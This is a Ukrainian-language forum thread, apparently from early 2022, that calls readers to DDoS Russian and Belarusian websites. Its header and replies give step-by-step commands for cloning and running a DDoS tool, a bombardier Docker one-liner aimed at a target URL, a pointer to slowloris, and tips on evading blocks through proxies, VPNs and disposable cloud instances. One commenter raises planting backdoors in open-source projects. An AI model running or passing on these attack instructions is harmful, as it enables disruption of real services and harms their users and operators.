DDOS російських сайтів, долучаємось

A Nuke is a type of antiquated denial-of-service (DoS) attack carried out by sending fragmented or corrupted (usually ICMP) packets to a target machine. For any machine running an older more vulnerable operating system, sending such packets to it will slow down and eventually stop it, resulting in a crash or Blue Screen of Death (BSoD) in the case of Windows.

Новий спосіб:

t.me/UkrITAgainstWar/5

Координація: t.me/itarmyofukraine2022 або t.me/ddosKotyky

Старий спосіб:

https://github.com/abionics/attacker
  1. git clone ^address_above
  2. cd attacker
  3. читаємо README

Є VPN провайдер начебто безкоштовний для українців www.f-secure.com/us-en

👍ПодобаєтьсяСподобалось9
До обраногоВ обраному0
LinkedIn

67 коментарів

Підписатись на коментаріВідписатись від коментарів Коментарі можуть залишати тільки користувачі з підтвердженими акаунтами.

Чому доменне ім’я, звідки береться список сайтів, має російський TLD?

Про всяк випадок змінив посілання, тепер список зберігається у гіті

Оновив шапку

невірне посилання на t.me/ddosKotyky (без підкреслювання «_»)

змінили посилання мб?

Пытаюсь делать по инструкции, открыл в Digital ocean несколько десятков виртуалок в разных регионах, но на каждой трафик несколько десятков kbps, редко когда до мегабита доходит, загрузка цп несколько процентов, что я делаю не так ?

Зараз обновив, теперь примусово використовується https (так як деякі сайти з апі все одно приходили з http), а також додав scaling у docker-compose, за замовчуванням 10, проте можна вказати довільну кількість ./start 20

Зараз пробую запустити з BitLaunch — повністю анонімний клауд, оплачується криптою. Відпишуся як піде

Сервіс глюкавий, але покатить

поясніть хтось чому реквестимо через http а не https?
attacker не отримує 200 але через https сайт доступний president.gov.by/en

Список сайтів та проксі підтягується з віддаленого серверу через API, зараз перевірив — там сайти оновились, усі через https
Проте за даним uptimia ті сайти зараз лежать)

Помітив, що деякі окупантські сайти використовують Cloudflare. Треба якась петиція про недопустимість співробітництва з агресором.

Как вы думаете, насколько этично будет open source разработчикам из Украины внедрить в свои популярные проекты с открытым исходным кодом бэкдоры, которые будут запускаться только для рос. айпишников?

Вы уверены что понимаете что значит «open source»?

Термин «этично» не может применяться в отношении орков в принципе.

Знаю, не совсем подходящая тема, но в другие не дают писать анонимам (даже со стажем).

Сегодня с утра обнаружил, что Youtube заблокировал канал «Россия 24». (

Я вижу, тут много призывов мамкиных кул-хацкеров и воинов эпохи социальных медиа. Моё мнение, почти 40-летнего «старикана» — не надо заниматься мелким кул-хацкерским пакостничеством: репортить Youtube каналы официальных медиа, ДДоС-ить гражданские сервисы.
По крайней мере в предыдущие дни боевых действий, посмотрев официальные РФ-иянские новости, фрагментами, можно понять, что к чему. Потому как через ботофермы РФ в соцсети нагоняют дезу уровня антиваксеров, люди принимают это за чистую монету, нервничают, суетятся, не высыпаются, заливаются алкоголем от депрессухи (а в Киеве раздали 25 тыс. огнестрельных, профессиональных стволов за 3 дня — думаю, пояснять не стоит).
Но если сопоставить с официальной РФ-ской позицией, то многая деза рассыпается на глазах. Примеры конкретные:
— якобы шквальный огонь артиллерии на Киев в ночь с 26 на 27, который начнётся вот-вот;
— всякая «ловля покемонов» с поиском на зданиях страшных меток — в РФ-ских официальных новостях вчера вечером с этого глумились.

Дядя давай без оцього всього. Репортити треба, будь-який дісрапшн — добре

не надо заниматься мелким кул-хацкерским пакостничеством: репортить Youtube каналы официальных медиа, ДДоС-ить гражданские сервисы.

А жарити орків наступаючих хоч треба, чи теж ні?

Не зрозумів причому тут Київ і бан Рашка 24 ?

Знаю, не совсем подходящая тема, но в другие не дают писать анонимам (даже со стажем).

яке прикре самогубство

Моё мнение, почти 40-летнего «старикана» — не надо заниматься мелким кул-хацкерским пакостничеством: репортить Youtube каналы официальных медиа, ДДоС-ить гражданские сервисы.

Чем больше каналов дезинформации будет забанено, тем больше шанс, что население россии на ютубе попадет на канал где передается более правдивая информация, от этого только плюс, смекаешь?

Если тебе сильно хочется знать что там на новостях Россия 24, подключись через российский VPN на их сайт и получи свою дозу.

Я попробую ответить всем, кто откомментировал мой пост.

Сейчас воскресение, последний выходной день. Мне кажется, не стоит тратить его на кресельно- клавиатурные войны. Лучше расслабиться, по возможности, чтобы продумать взвешенные ответы менеджерам и коллегам тех самых зарубежных заказчиков. Потому как на кону наши рабочие места, наличие проектов, долларовые доходы и будущее нашего ИТ-заробитчанства и внутренней эмиграции (для оставашек). Наша задача сейчас — выполнять работу по взятым на себя по контракту обязательства по предоставлению ИТ-услуг, пока для этого есть технические возможности. Лично я и 24-е, и 25-е число отработал в полном объёме — это то, что от нас ждут там, на Западе.

Кому очень хочется повоевать — почему не идёте на службу по контракту? Кому-то может больше подойдёт роль десантника, отрезающего головы вражеским солдатам. Кому больше по душе кул- хацкерство — идите и получайте инженерную военную специальность, со всякими там радарами, стратегиями, средствами радиоэлектронной борьбы и т.п. Кнопки в UI — Like, Post, Share, Re-Tweet, Report content, всякие скриптики — это не война, ИМХО, а около-военное дрочерство.

Якщо твоїх рідних вб’є снаряд, влучивши в будинок, якщо твоїх друзів не стане під ударом ворожого града, якщо твою кохану людину підло вб’ють на вулиці ДРГ, то багато-багато людей зробить все аби «віддячити».

І спосіб не матиме значення. Коктейль молотова, долучення до тероборони, допомога пораненим чи DoS русні.

Я теж пропрацював четвер і п’ятницю, хоч це і було дуже важко емоційно. І я буду це робити, аби мати можливість перекидувати гроші нашим і засирати їх канали зв’язку.

І так, я далеко від України, але мої рідні і близькі, мої друзі і знайомі — люди, які мені не байдужі — вони тут. Тому — я роблю те, що можу, аби їм було важче нас вбивати.

Ось така х*йня малята :(

Блять у тебя вечно проблемы с работой, то вечно срал в темах с ватными уезжуньками что блять в Украине зарплаты низкие, если ты тебя там увольняют раслабся, айти это не твое.

Соррі, мені в повному об’ємі відпрацювати не вдалось, в підвалі нет погано тяне. Забаньте цього мудака.

прости, забыл в погреб гарнитуру взять. и ноутбук тоже, вот черт.. как смогу, обязательно передам клиенту, что ты озабочен.

Но если сопоставить с официальной РФ-ской позицией, то многая деза рассыпается на глазах.

Сверяешь часы по позиции РФ?

По логам вже бачу ввімкнули російський аналог cloudflare. Якщо хтось знає як поцілити потрібні сервера — дайте знати

По логам вже бачу ввімкнули російський аналог cloudflare

який саме?

як поцілити

міняти вже заблоковані IP, на ще не заблоковані
забивати трафік по UDP
...

Судячи з основного сайту — це якась гавностанська контора.

я работал на клиента который их юзал, по сути защита у них больше расщитана на мощность атаки, т.е. Kpp/s зачастую они просто закрывают все порты и протоколы за исключением нужных, но если влить много трафла они тоже лягут, на момент моей работы на того клиента(лет 5 назад) они ложились от 150-170 Kpp/s

Найс, дякую. Сподіваюсь, хтось з координаторів прочитає це

F-Secure FREEDOME — Free in Ukraine
6 months for 3 devices
onlineshop.f-secure.com/...​free-freedome-for-ukraine

WARNING | 57 — issue happened
помилка, що в такому разі робити?

перероби як в шапці і запусти заново. взагалі треба раз на годину перезапускати

для эффективности нужно либо постоянно менять IP, либо заходить с российских. остальное — просто трафик засрете.

там список російських проксі з віддаленого серверу підтягується

https://github.com/abionics/attacker
Покращив попередній спосіб від Psyhich, асинхронний варіант тієї ж бібліотеки пришвидшує атаку у рази
Гайд той самий:
1) sudo apt install git python
2) git clone github.com/abionics/attacker
3) cd attacker
4) pip3 install -r requirements.txt
5) python3 main.py
АБО через докер
1) git clone https://github.com/abionics/attacker
2) cd attacker
3) docker-compose up --build -d
4) «Щоб призупинити зашквар і трохи провітрити хату» docker-compose down
Деталі у readme, про усі проблеми пишіть у коментах, буду намагатися допомогти
Також координуємо наші атаки у группах, наприклад t.me/ddosRussians (13к юзерів)

Слава Україні!

дякую, якраз хотів поміняти на ваш форк, бо там вирішене питання з потоками

Дякую за пул-реквест та поради у чатах, запушив нову версію (breaking changes немає)

тут

github.com/Psyhich/attacker

блокує лиш kremlin.ru (код в проекті бере json з сайту що повертає лиш 1 ресурс. Малувато..)

Дякую, запустив на своєму німецькому vps.

Сколько потоков ставить для attack.py?

оновив шапку, новий код тут github.com/abionics/attacker

Якшо є розробники (фрілансери) сайтів у яких лишилися доступи до російських сайтів прохання розмістити на іх сторінках банера

drive.google.com/...​M6gqCv0TXiKBX4UsTgRVd8xHo

інструкції в шапці оновлено

Потрібно змусити російський Habr проявити громадську позицію. Доречі, перегляньте телеграм Федорова.

Альо-о, народ! Досити напряму зі своїх сіток це тупо! Вони просто банять сегменти повністю.
При цьому через VPN сайти доступні, відповідно всередині Раші також.
Бачу що вже писали, але пишу ще раз бо спостерігаю «результати».

альтернативи?
підключаємось всередину росії і організовано бомбимо зсередини

інструкції в шапці оновлено

амазоновские ес2 не забанят за

bombardier

?

забанят. но вы просто дропайте ec2 и переподнимаете

теоретично, це порушує політику aws. звичайно, не варто таке робити через акаунт, на якийсь щось важливе зав’язане. але я от запустив auto scaling group на 20 інстансів, де при старті запускається пайтонівський скрипт. поки що працює

Друзі, написав невеличку прогу для дос і після кількох десятків тисяч запитів за хв мій айпі заблеклістили (тестував на сайтах gosuslugi.ru та cbr.ru)
Підкажіть скільки максимально можна відправляти запитів на хвилину/секунду з однієї айпі щоб не бути забанененим?

Переключись на vpn, і бомби нюками а не спамом. Bombardier наприклад.
Українські айпі зразу блокують

Ребята, собираемся в группы. Организовываю канал кибертеробороны. Инструкции отсюда шарю к себе, спасибо вам за это

t.me/ CGrrl1ygOmU2OTc6

есть можный комп но я не хакерс, как мне помочь своими ресурсами и вашими знаниями?

ещё как вариант:

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l target_url --http1

осторожно с трафиком, используйте VPN.

изящная альтернатива лобовой атаке:
github.com/gkbrk/slowloris

дякую, додав в шапку

Використовуйте, будь ласка, VPN. Особливо закордонні. Не хочу щоб у вас проблеми з провайдером потім були

Якщо прикупити кілька дроплетів на DigitalOcean та запустити з них, не забанять як вважаєте?

Не думаю, але краще зробити там же гейтвей з шифруванням, якщо це не флуд атака.
Дос атака технічно йде проти terms of use будь якого провайдера, але зараз такі часи що всім пофіг.

есть мощный комп но я не хакерс, как мне помочь своими ресурсами и вашими знаниями?

дякую що попередили.порадьте будь-ласка якийсь впн щоб не було проблем з провайдером. і якщо можна то розкажіть дуже коротно як це все грамотно налаштувати.

В мене nordvpn. Як налаштувати погугліть пліз, я вже без сил.

Підписатись на коментарі